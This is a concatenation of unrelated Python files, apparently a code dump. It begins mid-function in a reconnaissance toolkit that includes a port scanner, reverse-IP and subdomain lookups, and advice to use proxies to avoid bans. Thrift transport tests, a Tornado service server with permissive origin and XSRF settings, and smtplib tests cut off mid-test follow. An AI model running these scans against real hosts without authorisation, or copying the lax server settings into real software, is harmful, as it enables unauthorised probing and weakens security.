c=c.replace(n,"")
if "<a" in c:
c=c.split('<a')[0].split('!')[0]
c=c.split('</a>')[0].split('!')[0]
if "<img" in c:
c=c.split('<img')[1].split('!')[0]
c=c.split('/>')[1].split('!')[0]
n=a.strip()+': '+c.strip()
h+=n+'\n'
except Exception as e:
pass
except Exception as e:
pass
return h
def norton_rate(u,logs=True,returning=False,timeout=15,proxy=None):
'''
this function takes any giving and gives a security report from: safeweb.norton.com, if it is a: spam domain, contains a malware...
it takes 3 arguments:
u: the link to check
logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
returning: (set by default to: False) returning the report as a string format if it is set to: True.
usage:
>>>import bane
>>>url='http://www.example.com'
>>>bane.norton_rate(domain)
'''
if proxy:
proxy={'http':'http://'+proxy}
s=""
try:
if logs==True:
print('[*]Testing link with safeweb.norton.com')
ur=urllib.quote(u, safe='')
ul='https://safeweb.norton.com/report/show?url='+ur
c=requests.get(ul, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
soup = BeautifulSoup(c, "html.parser").text
s=soup.split("Summary")[1].split('=')[0]
s=s.split("The Norton rating")[0].split('=')[0]
if logs==True:
print('[+]Report:\n',s.strip())
except:
pass
if returning==True:
return s.strip()
def myip(proxy=None,proxy_type=None,timeout=15):
'''
this function is for getting your ip using: ipinfo.io
usage:
>>>import bane
>>>bane.myip()
xxx.xx.xxx.xxx
'''
proxies={}
if proxy:
if proxy_type.lower()=="http":
proxies = {
"http": "http://"+proxy,
}
if proxy_type.lower()=="socks4":
proxies = {
"http": "socks4://"+proxy,
}
if proxy_type.lower()=="socks5":
proxies = {
"http": "socks5://"+proxy,
}
try:
return requests.get("http://ipinfo.io/ip",headers = {'User-Agent': random.choice(ua)}, proxies=proxies ,timeout=timeout).text.strip()
except:
pass
return ''
def who_is(u):
u=u.replace('www.','')
try:
return whois.whois(u)
except:
pass
return {}
def geoip(u,timeout=15,proxy=None):
'''
this function is for getting: geoip informations
'''
try:
if proxy:
proxy={'http':'http://'+proxy}
r=requests.get('https://geoip-db.com/jsonp/'+u,headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
return json.loads(r.split('(')[1].split(')')[0])
except:
pass
return {}
def headers(u,timeout=10,logs=True,returning=False,proxy=None):
try:
if proxy:
proxy={'http':'http://'+proxy}
s=requests.session()
a=s.get(u,headers = {'User-Agent': random.choice(ua)} ,proxies=proxy,timeout=timeout).headers
except Exception as ex:
return None
if logs==True:
for x in a:
print("{} : {}".format(x,a[x]))
if returning==True:
return a
def reverse_ip_lookup(u,timeout=10,logs=True,returning=False,proxy=None):
'''
this function is for: reverse ip look up
if you've used it 100 times in 24 hours, your IP will be banned by "api.hackertarget.com" so i highly recommand you to use the "proxy" option by adding a http(s) proxy:
bane.reverse_ip_lookup('XXX.XXX.XXX.XXX',proxy='IP:PORT')
'''
if proxy:
proxy={'http':'http://'+proxy}
try:
r=requests.get("https://api.hackertarget.com/reverseiplookup/?q="+u,headers = {'User-Agent': random.choice(ua)} ,proxies=proxy,timeout=timeout).text
return r.split('\n')
except Exception as ex:
pass
return []
'''
end of the information gathering functions using: api.hackertarget.com
'''
def resolve(u,server='8.8.8.8',timeout=1,lifetime=1):
o=[]
r = dns.resolver.Resolver()
r.timeout = 1
r.lifetime = 1
r.nameservers = [server]
a = r.query(u)
for x in a:
o.append(str(x))
return o
"""
this class is used to scan a target for open ports
usage:
a=bane.port_scan("8.8.8.8",ports=[21,22,23,80,443,3306],timeout=5)
print(a.result)
this should give you a dict like this:
{'443': 'Open', '22': 'Closed', '21': 'Closed', '23': 'Closed', '80': 'Closed', '3306': 'Closed'}
"""
class port_scan:
def scan (self):
p=self.por[self.flag2]
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.timeout)
r = s.connect_ex((self.target, int(p)))
if r == 0:
self.result.update({str(p):"Open"})
else:
self.result.update({str(p):"Closed"})
s.close()
def __init__(self,u,ports=[21,22,23,25,43,53,80,443,2082,3306],timeout=5):
try:
thr=[]
self.result={}
self.timeout=timeout
self.por=ports
self.target=u
for x in range(len(self.por)):
self.flag2=x
thr.append(threading.Thread(target=self.scan).start())
time.sleep(.001)
while(len(self.result)!=len(ports)):
time.sleep(.1)
except:
pass
for x in thr:
try:
x.join(1)
except:
pass
del x
def subdomains_finder(u,process_check_interval=5,logs=True,returning=False,requests_timeout=15,https=False):
https_flag=0
if (https==True) or('https://' in u):
https_flag=1
if "://" in u:
host=u.split('://')[1].split('/')[0]
else:
host=u
sd=[]
while True:
try:
s=requests.session()
r=s.post('https://scan.penteston.com/scan_system.php',data={"scan_method":"S201","test_protocol":https_flag,"test_host":host},timeout=requests_timeout).text
if '"isFinished":"no"' not in r:
if logs==True:
print("\n[+]Scan results:")
c=r.split('strong><br\/>')[1].replace('"}','')
for x in (c.split('<br\/>')):
if x.strip():
if logs==True:
print(x)
sd.append(x)
if returning==True:
return sd
break
else:
if logs==True:
sys.stdout.write("\r[*]Scan in progress...")
sys.stdout.flush()
#print("[*]Scan in progress...")
except KeyboardInterrupt:
break
except:
pass
try:
time.sleep(process_check_interval)
except KeyboardInterrupt:
break
except:
pass
if returning==True:
return []
|
test_framed_transport.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import sys
import logging
import socket
import threading
import time
from os import path
from unittest import TestCase
import pytest
from tornado import ioloop
import thriftpy
from thriftpy.tornado import make_server
from thriftpy.rpc import make_client
from thriftpy.transport.framed import TFramedTransportFactory
from thriftpy.protocol.binary import TBinaryProtocolFactory
try:
import asyncio
except ImportError:
asyncio = None
from thriftpy._compat import CYTHON
logging.basicConfig(level=logging.INFO)
addressbook = thriftpy.load(path.join(path.dirname(__file__),
"addressbook.thrift"))
class Dispatcher(object):
def __init__(self, io_loop):
self.io_loop = io_loop
self.registry = {}
def add(self, person):
"""
bool add(1: Person person);
"""
if person.name in self.registry:
return False
self.registry[person.name] = person
return True
def get(self, name):
"""
Person get(1: string name)
"""
if name not in self.registry:
raise addressbook.PersonNotExistsError()
return self.registry[name]
class FramedTransportTestCase(TestCase):
TRANSPORT_FACTORY = TFramedTransportFactory()
PROTOCOL_FACTORY = TBinaryProtocolFactory()
def mk_server(self):
sock = self.server_sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
sock.setblocking(0)
self.port = sock.getsockname()[-1]
self.server_thread = threading.Thread(target=self.listen)
self.server_thread.setDaemon(True)
self.server_thread.start()
def listen(self):
self.server_sock.listen(128)
if asyncio:
# In Tornado 5.0+, the asyncio event loop will be used
# automatically by default
asyncio.set_event_loop(asyncio.new_event_loop())
self.io_loop = ioloop.IOLoop.current()
server = make_server(addressbook.AddressBookService,
Dispatcher(self.io_loop), io_loop=self.io_loop)
server.add_socket(self.server_sock)
self.io_loop.start()
def mk_client(self):
return make_client(addressbook.AddressBookService,
'127.0.0.1', self.port,
proto_factory=self.PROTOCOL_FACTORY,
trans_factory=self.TRANSPORT_FACTORY)
def setUp(self):
self.mk_server()
time.sleep(0.1)
self.client = self.mk_client()
def tearDown(self):
self.io_loop.stop()
@pytest.mark.skipif(sys.version_info[:2] == (2, 6), reason="not support")
def test_able_to_communicate(self):
dennis = addressbook.Person(name='Dennis Ritchie')
success = self.client.add(dennis)
assert success
success = self.client.add(dennis)
assert not success
@pytest.mark.skipif(sys.version_info[:2] == (2, 6), reason="not support")
def test_zero_length_string(self):
dennis = addressbook.Person(name='')
success = self.client.add(dennis)
assert success
success = self.client.get(name='')
assert success
if CYTHON:
from thriftpy.transport.framed import TCyFramedTransportFactory
from thriftpy.protocol.cybin import TCyBinaryProtocolFactory
class CyFramedTransportTestCase(FramedTransportTestCase):
PROTOCOL_FACTORY = TCyBinaryProtocolFactory()
TRANSPORT_FACTORY = TCyFramedTransportFactory()
|
server.py
|
#!/usr/bin/python
# logging should be setup first so imported modules' logging is configured too
import os
from vai.dpuv1.rt import logging_mp
log_file = os.environ['VAI_ALVEO_ROOT'] + "/neptune/logging.ini"
logging_mp.setup_logger(log_file, 'neptune')
from datetime import datetime
import json
import signal
import threading
import time
import tornado.ioloop
import tornado.web
import tornado.websocket
import uuid
import importlib
import logging
import six
if six.PY3:
import asyncio
import numpy as np
from tornado.options import define, options, parse_command_line
if six.PY3:
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from neptune.common import DummyClass, list_submodules, hinted_tuple_hook
if six.PY3:
from neptune.common_py3 import cancel_async_tasks
else:
from neptune.common import cancel_async_tasks
import neptune.construct as construct
from neptune.service_manager import ServiceManager
from neptune.node_manager import NodeManager
from vai.dpuv1.rt import xstream
define("port", default=8998, help="run web server on this port", type=int)
define("wsport", default=8999, help="run websocket server on this port", type=int)
define("debug", default=True, help="run in debug mode")
logger = logging.getLogger(__name__)
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args):
self.render("index.html", wsport=options.wsport)
class ListServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
ret = {'services': []}
try:
services_list = ServiceManager().list()
services = []
for name, svc in services_list.items():
services.append({
'name': name,
'state': svc['state'],
'url': svc['url'],
'throughput': svc['throughput']
})
services.sort(key=lambda x: x['name'])
ret = {'services': services}
except Exception as e:
logger.exception("List service error")
self.write(json.dumps(ret, sort_keys=True))
class QueryServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("service")
ret = {}
try:
services_list = ServiceManager().list()
if service_name in services_list:
ret = services_list[service_name]
del ret['service']
except Exception as e:
logger.exception("Query service error")
self.write(json.dumps(ret, sort_keys=True))
class StartServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
runtime_args = self.get_argument("args", {})
ServiceManager().start(service_name, runtime_args)
self.write("service started")
def post(self, *args):
data = json.loads(self.request.body)
service_name = data["id"] # in unicode
runtime_args = data["args"] if 'args' in data else {}
ServiceManager().start(service_name, runtime_args)
self.write("service started")
class StopServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
ServiceManager().stop(service_name)
self.write("service stopped")
class ConstructServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
self.write("POST a recipe to this address to construct it")
def post(self, *args):
"""
Parse JSON arguments in POST body. In Requests module, use json key to
pass in arguments, not data (which may clobber JSON objects)
"""
recipe = json.loads(self.request.body, object_hook=hinted_tuple_hook)
tornado_handler = construct.construct(recipe)
name = str(recipe['name'])
url = str(recipe['url'])
self.application.add_handlers(
r".*", # match any host
tornado_handler
)
self.write("service %s constructed at /serve/%s" % (name, url))
# FIXME clients being able to destroy services others may be using is problematic
class DestructServiceHandler(tornado.web.RequestHandler):
def _destroy(self):
url = str(self.get_argument("url"))
name = str(self.get_argument("name"))
fake_request = DummyClass()
found_index = -1
# There's no method in Tornado to delete an added handler currently.
# By examining the source, the code below works to do so. If Tornado
# adds an API to do this, this code should be replaced. It may also
# break with changes to Tornado (tested with Tornado 5.1.1 on 8/15/2019)
for index, parent_rule in enumerate(self.application.default_router.rules):
rules = parent_rule.target.rules
for rule in rules:
fake_request.path = r"/serve/" + url
if isinstance(rule.matcher.match(fake_request), dict):
found_index = index
return found_index, name, url
def get(self, *args):
self.write("POST the name and url of the service to destroy") # TODO only should specify one
def post(self, *args):
found_index, name, url = self._destroy()
if found_index != -1:
del self.application.default_router.rules[found_index]
ServiceManager().remove(name)
recipe_cache = os.environ["VAI_ALVEO_ROOT"] + "/neptune/recipes/recipe_%s.bak" % name
os.remove(recipe_cache)
self.write("service destroyed at /serve/%s" % url)
else:
self.write("Service %s cannot be destroyed as it does not exist" % name)
class RenderHandler(tornado.web.RequestHandler):
def get(self, *args):
url = self.request.uri
url_arg = url.split('/')[-1]
html = url_arg + ".html"
self.render(html, wsport=options.wsport)
class RequestIdGenerator(object):
def __init__(self):
self.handler_ids = {}
def get(self, name='__default__'):
if name not in self.handler_ids:
self.handler_ids[name] = 0
curr_id = self.handler_ids[name]
self.handler_ids[name] = (curr_id + 1) % 10000 # wraparound
return curr_id
class WebSocketHandler(tornado.websocket.WebSocketHandler):
clientConnections = []
def __init__(self, *args, **kwargs):
super(WebSocketHandler, self).__init__(*args, **kwargs)
print("[WS] websocket ready")
def open(self):
self.id = str(uuid.uuid4())
self.last_send = None
print("[WS] websocket opened %s" % self.id)
self.send('id', self.id)
WebSocketHandler.clientConnections.append(self)
def on_message(self, messageStr):
try:
print('[WS] message received from %s: %s' % (self.id, messageStr))
message = json.loads(messageStr)
if message['topic'] == 'update_id':
origId = message['id']
self.id = origId # take over original id
except:
pass
def on_close(self):
print("[WS] websocket closed %s" % self.id)
WebSocketHandler.clientConnections.remove(self)
def send(self, topic, msg):
if not msg:
return
now = time.time()
if self.last_send and (now - self.last_send) < 0.05:
# don't flood the client with too many messages; drop
return
self.last_send = now
try:
msg_POD = {}
msg_POD['time'] = datetime.now().isoformat()
msg_POD['topic'] = topic
msg_POD['message'] = msg
self.write_message(json.dumps(msg_POD))
except Exception as e:
print(e)
@staticmethod
def send_to_client(id, topic, msg):
try:
for c in WebSocketHandler.clientConnections:
if c.id == id:
c.send(topic, msg)
except:
pass
@staticmethod
def broadcast(topic, msg):
try:
for c in WebSocketHandler.clientConnections:
c.send(topic, msg)
except:
pass
def check_origin(self, origin):
return True
class ServerWebApplication(tornado.web.Application):
def __init__(self):
self.request_id_gen = RequestIdGenerator()
handlers = self.init_handlers()
super(ServerWebApplication, self).__init__(
handlers,
cookie_secret="COOKIE_SECRET",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=False, #? should be true?
autoreload=False,
debug=options.debug
)
def init_handlers(self):
"""
Define the basic REST handlers. These cannot be destroyed.
Returns:
List: List of handler tuples for initializing a Tornado web app
"""
handlers = []
handlers.append((r"/", IndexHandler))
handlers.append((r"/services/list", ListServiceHandler))
handlers.append((r"/services/query", QueryServiceHandler))
handlers.append((r"/services/start", StartServiceHandler))
handlers.append((r"/services/stop", StopServiceHandler))
handlers.append((r"/services/construct", ConstructServiceHandler))
handlers.append((r"/services/destruct", DestructServiceHandler))
handlers.append((r"/render/([^/]+)", RenderHandler))
return handlers
class ServerApp(object):
def __init__(self):
signal.signal(signal.SIGINT, self.signal_handler)
# signal.signal(signal.SIGQUIT, self.sigquit_handler)
self.do_exit = False
self.hbeat_id = 0
self.hbeat = 0
# self.do_restart = False
self.xserver = xstream.Server()
parse_command_line()
self.web_app = ServerWebApplication()
# Add handlers for default services here so they can be destroyed if
# needed. Handlers installed in the web_app __init__ cannot be destroyed.
recipes = self.get_recipes()
for recipe in recipes:
tornado_handler = construct.construct(recipe)
self.web_app.add_handlers(
r".*", # match any host
tornado_handler
)
self.web_server = self.web_app.listen(options.port)
self.ws_app = tornado.web.Application([(r"/", WebSocketHandler)])
self.ws_server = self.ws_app.listen(options.wsport)
self.xspub = xstream.Publisher()
self.xs2server = threading.Thread(target=ServerApp.xstream2server)
self.xs2server.start()
self.heartbeat_thread = threading.Thread(target=ServerApp.heartbeat, args=(lambda: self.do_exit,))
self.heartbeat_thread.start()
@staticmethod
def get_recipes():
"""
Get all recipes from the recipes folder. If recipe_*.bak files exist,
use those to construct services. Otherwise, construct from source using
the default recipe functions.
"""
recipes = []
recipes_cache = os.environ["VAI_ALVEO_ROOT"] + "/neptune/recipes/"
file_names = [fn for fn in os.listdir(recipes_cache)
if fn.startswith('recipe_') and fn.endswith('.bak')]
if file_names:
logger.info("Constructing services from cache")
for file_name in file_names:
with open(recipes_cache + file_name) as f:
recipes.append(json.load(f, object_hook=hinted_tuple_hook))
else:
logger.info("Constructing services from source")
modules = list_submodules('neptune.recipes')
for module_path in modules:
module = importlib.import_module(module_path)
attrs = dir(module)
for attr in attrs:
if attr.startswith('recipe_'):
recipe = getattr(module, attr)
if callable(recipe):
recipes.append(recipe().to_dict())
return recipes
@staticmethod
def xstream2server():
xs = xstream.Subscribe("__server__")
while True:
# subscribe to special "__server__" channel for
# other processes to send messages to this server
# e.g. speedodata -> websockets
msg_str = xs.get_msg()
if msg_str is None:
break
try:
msg = json.loads(msg_str)
if msg['topic'] == 'speedodata':
WebSocketHandler.broadcast(msg['topic'], msg['message'])
elif msg['topic'] == 'callback' and 'callback_id' in msg:
# print("sending callback message")
# print(msg['message'])
WebSocketHandler.send_to_client(\
msg['callback_id'], msg['topic'], msg['message'])
elif msg['topic'] == 'xs_throughput':
report = json.loads(msg['message'])
#print(report)
for name, throughput in report.items():
serviceName = name.split('.')[0]
edgeName = name[name.find('.')+1:]
ServiceManager().update_throughput_stats(serviceName,
edgeName, throughput)
except:
pass
cancel_async_tasks()
@staticmethod
def heartbeat(stop):
xs = xstream.Subscribe("__heartbeat__", timeout=5000)
service_manager = ServiceManager()
node_status = {}
def check_services(node_status):
if stop:
return
invalid_services = []
for service, status in node_status.items():
last_valid = status['last_valid']
service_state = service_manager._services[service]['state']
is_starting = service_state == service_manager.STARTING
is_started = service_state == service_manager.STARTED
# if the service has been stopped, clear it
if service_state == service_manager.STOPPED:
invalid_services.append(service)
# if there's a discrepancy in what the service_manager says
# and what we have cached, clear it
elif is_starting and node_status[service]['is_started']:
invalid_services.append(service)
# if it's started and hasn't been valid in the last n secs,
# restart it
elif is_started and now - last_valid > 5:
logger.warning("Service %s is dead, restarting" % service)
service_manager.stop(service)
service_manager.start(service)
node_status[service]['is_started'] = False
for service in invalid_services:
del node_status[service]
logger = logging.getLogger(__name__)
while True:
if stop():
break
# when enabling coverage, this line will raise an exception for some
# reason. For now, just catching it
try:
msg_str = xs.get_msg()
now = time.time()
except Exception:
logger.exception("Shouldn't happen")
# the get_msg timed out, i.e. no heartbeats received
if msg_str == (None, None):
check_services(node_status)
continue
msg = json.loads(msg_str)
service = msg['service']
channel = msg['channel']
# if this is the first time we've seen this service
if service not in node_status:
_first_edge, last_edge = service_manager._get_graph_io(service)
node_status[service] = {
'last_valid': 0, # saves the last time this service was valid
'is_started': False, # our check that services haven't stopped
'last_edge': last_edge[0], # saves the last edge of the service
'channels': {} # save heartbeat times for each channel
}
node_status[service]['channels'][channel] = now
service_state = service_manager._services[service]['state']
if node_status[service]['last_edge'] == channel:
if service_state == service_manager.STARTING:
if not node_status[service]['is_started']:
service_manager._services[service]['state'] = service_manager.STARTED
node_status[service]['is_started'] = True
else:
# there's a discrepancy. For example, the service may
# have been stopped and something else started with
# the same name. In this case, clear the cache
del node_status[service]
continue
node_status[service]['last_valid'] = now
check_services(node_status)
cancel_async_tasks()
def launch(self):
tornado.ioloop.PeriodicCallback(self.check_exit, 500).start()
loop = tornado.ioloop.IOLoop.instance()
loop.start()
loop.close()
def signal_handler(self, signum, frame):
logger.status("Shutting down server...")
ServiceManager().stop_all()
self.do_exit = True
# def sigquit_handler(self, signum, frame):
# print("restarting server...")
# ServiceManager().stop_all()
# self.do_restart = True
def check_exit(self):
if self.do_exit:
self.xspub.end("__server__")
self.xs2server.join()
self.heartbeat_thread.join()
self.ws_server.stop()
self.web_server.stop()
cancel_async_tasks()
del self.xserver
elif self.hbeat > 4:
self.hbeat = 0
service_manager = ServiceManager()
services_list = service_manager.list()
started_services = []
for name, svc in services_list.items():
if svc['state'] >= service_manager.STARTING:
started_services.append(name)
for service in started_services:
msg = json.dumps({
'__heartbeat__': service,
'id': 'hbeat_' + str(self.hbeat_id)
})
service_manager.send(service, 0, np.zeros(1), msg)
self.hbeat_id = (self.hbeat_id + 1) % 9999
else:
self.hbeat += 1
# the restarted server is unresponsive. We don't need this functionality
# right now but if needed, it needs to be debugged.
# if self.do_restart:
# self.xspub.end("__server__")
# self.xs2server.join()
# self.ws_server.stop()
# self.web_server.stop()
# del self.xserver
# tornado.ioloop.IOLoop.instance().stop()
# self.do_restart = False
# ServiceManager()._drop()
# NodeManager()._drop()
# xstream.Statistics()._drop()
# main()
def main():
logging_directory = os.environ['VAI_ALVEO_ROOT'] + '/neptune/logs/'
log_name = '_{:%Y-%m-%d}.log'.format(datetime.now())
with open(logging_directory + 'neptune' + log_name, 'a') as f:
f.write("################################################################\n")
# https://github.com/tornadoweb/tornado/issues/2531
if six.PY3:
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
app = ServerApp()
app.launch()
if __name__ == "__main__":
main()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
